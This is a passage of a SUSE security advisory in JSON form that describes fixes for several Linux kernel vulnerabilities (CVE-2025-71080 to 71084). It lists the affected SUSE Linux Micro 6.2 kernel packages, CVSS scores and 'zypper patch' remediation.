"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
